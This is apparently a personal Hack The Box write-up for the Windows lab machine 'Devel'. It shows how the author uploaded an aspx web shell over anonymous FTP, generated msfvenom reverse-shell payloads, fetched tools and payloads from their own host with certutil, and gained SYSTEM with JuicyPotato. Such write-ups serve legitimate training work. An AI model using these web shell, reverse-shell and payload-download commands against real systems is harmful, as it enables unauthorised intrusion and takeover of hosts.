HTB Writeups
  • HTB Writeups
  • Boxes: Very Easy
    • Academy
    • Archetype
    • Arctic
    • Base
    • Bike
    • Blue
    • Explosion
    • Included
    • Markup
    • Oopsie
    • Redeemer
    • Responder
    • Shield
    • Unified
    • Vaccine
  • Boxes: Easy
    • Analytics
    • Armageddon
    • Bashed
    • Beep
    • Blocky
    • Bounty Hunter
    • Buff
    • Cap
    • CozyHosting
    • Devel
    • Explore
    • Forest
    • Grandpa
    • Granny
    • Horizontall
    • Jerry
    • Keeper
    • Knife
    • Lame
    • Late
    • Legacy
    • Mirai
    • Netmon
    • Nibbles
    • Optimum
    • Paper
    • Photobomb
    • Precious
    • RedPanda
    • Return
    • Sau
    • ScriptKiddie
    • Sense
    • Servmon
    • Shocker
    • Shoppy
    • Squashed
    • Trick
  • Boxes: Medium
    • Poison
  • Challenges
    • Behind the Scenes
    • Canvas
    • Debugging Interface
    • Digital Cube
    • Easy Phish
    • Find the Easy Pass
    • Forest
    • Infiltration
    • misDIRection
    • Pusheen Loves Graphs
    • Retro
    • Signals
    • The Secret of a Queen
    • Wrong Spooky Season
  • Fortresses
  • Cyber Apocalypse 2023: The Cursed Mission
    • The Cursed Mission
    • Alien Cradle
    • Critical Flight
    • Debug
    • Extraterrestrial Persistence
    • Getting Started
    • Needle in the Haystack
    • Orbital
    • Packet Cyclone
    • Passman
    • Perfect Sync
    • Persistence
    • Plaintext Tleasure
    • Questionnaire
    • Reconfiguration
    • Relic Maps
    • Roten
    • Secret Code
    • Shattered Tablet
    • Small StEps
  • Hack the Boo 2023
    • Hauntmart
    • Spellbrewery
    • Trick or Treat
    • Valhalloween
  • Cyber Apocalypse 2024: Hacker Royale
    • Hacker Royale
    • An Unusual Sighting
    • BoxCutter
    • BunnyPass
    • Character
    • Data Siege
    • Delulu
    • Dynastic
    • Fake Boost
    • Flag Command
    • Game Invitation
    • It has begun
    • KORP Terminal
    • Labyrinth Linguist
    • LockTalk
    • Lucky Faucet
    • Makeshift
    • Maze
    • Packed Away
    • Phreaky
    • Primary Knowledge
    • Pursue the Tracks
    • Rids
    • Russian Roulette
    • Stop Drop and Roll
    • Testimonial
    • TimeKORP
    • Unbreakable
    • Urgent
  • CYBER APOCALYPSE 2025: Tales from Eldoria
    • Tales from Eldoria
    • A New Hire
    • Cave Expedition
    • Echoes in Stone
    • Eldorion
    • Embassy
    • EncryptedScroll
    • HeliosDEX
    • Quack Quack
    • Silent Trap
    • Stealth Invasion
    • Tales for the Brave
    • The Ancient Citadel
    • The Hillside Haven
    • The Stone That Whispers
    • Thorins Amulet
    • ToolPie
    • Traces
    • Trial by Fire
    • Whispers of the Moonbeam
Powered by GitBook
On this page
  • Enumeration
  • Shell Access
  • Internal Enumeration
  • Privilege Escalation
  1. Boxes: Easy

Devel

Personal Rating: Medium

PreviousCozyHostingNextExplore

Last updated 1 year ago

Enumeration

sudo nmap -sV -sC <IP>

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

It looks like I can access the directory of the IIS webserver via ftp.

If I can write files here I can place an aspx webshell

As seen here, this works.

Shell Access

Generating a web shell payload:

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f aspx > shell.aspx

I received a connection, but it dies when I give a command and shows no output

I placed antak.aspx on the host with the same ftp put method. This worked, so I will create a shell from here.

Internal Enumeration

PS> whoami

iis apppool\web

Got the user babis.

I ran systeminfo on the host and placed the output in a file. I then ran wesng over it to check for vulnerabilities. The system is an unpatched Windows 7 as it seems, so there should be plenty.

Perfect, this worked: certutil.exe -urlcache -f http://10.10.16.6:8000/winPEASx86.exe C:\Users\Public\winpeasx86.exe

Lets see if this works: cmd /c C:\Users\Public\winpeasx86.exe > C:\Users\Public\peasout.txt

I could get a proper reverse shell by creating this payload and uploading it with certutil:

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

The user has extensive privileges enabled that would allow for privesc regardless of vulnerabilities:

SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

It seems like I cannot really use winpeas as I do not get any output.

Privilege Escalation

Doing more research on the output of this:

python3 wes.py /HTBfolder/Boxes/HTB-Devel/systeminfo.txt -s critical > /HTBfolder/Boxes/HTB-Devel/wes-output.txt

Trying this: CVE-2010-0232, I found this resource:

I found the exploit with searchsploit and it looks promising:

searchsploit kitrap

Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015) | windows/local/11199.txt

Shellcodes: No Results

searchsploit -p 11199

Exploit: Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
URL: https://www.exploit-db.com/exploits/11199
Path: /usr/share/exploitdb/exploits/windows/local/11199.txt
Codes: CVE-2010-0232, OSVDB-61854, MS10-015
Verified: True
File Type: assembler source, ASCII text
kate /usr/share/exploitdb/exploits/windows/local/11199.txt

Actually, screw this, I want to try JuicyPotato again as it is basic and common. We need an x86 version of it in this case.

Generating a new shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=7777 -f exe > privshell-x86.exe

Getting the exploit:

Transferring the exploit:

Transferring the shell:

certutil.exe -urlcache -f http://10.10.16.6:8000/privshell-x86.exe privshell.exe

Exploitation:

juicypotato.exe -p C:\Users\Public\privshell.exe -l 1337 -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

With a netcat listener open on my host, this worked!

If it would not have worked, I would have tried some other CLIDs, there are lists online and tools to list them on the device.

This did not work

certutil.exe -urlcache -f juicypotato.exe

http://www.exploit-db.com/exploits/15609/
http://10.10.16.6:8000/Juicy.Potato.x86.exe
GitHub - ivanitlearning/Juicy-Potato-x86: Juicy Potato for x86 WindowsGitHub
GitHub - ycdxsb/WindowsPrivilegeEscalation: Collection of Windows Privilege Escalation (Analyse/PoC/Exp...)GitHub
Impersonating Privileges with Juicy PotatoMedium
Logo
Logo
Logo